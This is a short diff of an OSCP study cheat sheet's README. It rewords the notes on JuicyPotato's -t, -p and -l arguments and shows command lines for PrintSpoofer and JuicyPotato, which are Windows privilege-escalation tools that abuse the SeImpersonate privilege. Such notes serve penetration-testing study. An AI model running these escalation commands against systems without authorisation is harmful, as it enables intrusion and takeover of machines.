peterkhe1999/CheatSheet/OSCP/README.md

 .\PrintSpoofer64.exe -i -c powershell.exe
 ```

-3 mandatory arguments: -t, -p, and -l.
+3 mandatory arguments: -t, -p, and -l

-* -t: is the "Process creation mode".
-We need CreateProcessWithToken (pass the t value) if we have the SeImpersonate privilege.
+* -t: the "Process creation mode".
+If we have the SeImpersonate privilege, pass the t value (CreateProcessWithToken)
-* -p: specifies the program we are trying to run.
+* -p: the program we are trying to run.
-* -l: specify an arbitrary port for the COM server to listen on
+* -l: an arbitrary port for the COM server to listen on

 ```bat
 JuicyPotato.exe -t t -p C:\Users\Public\whoami.exe -l 5837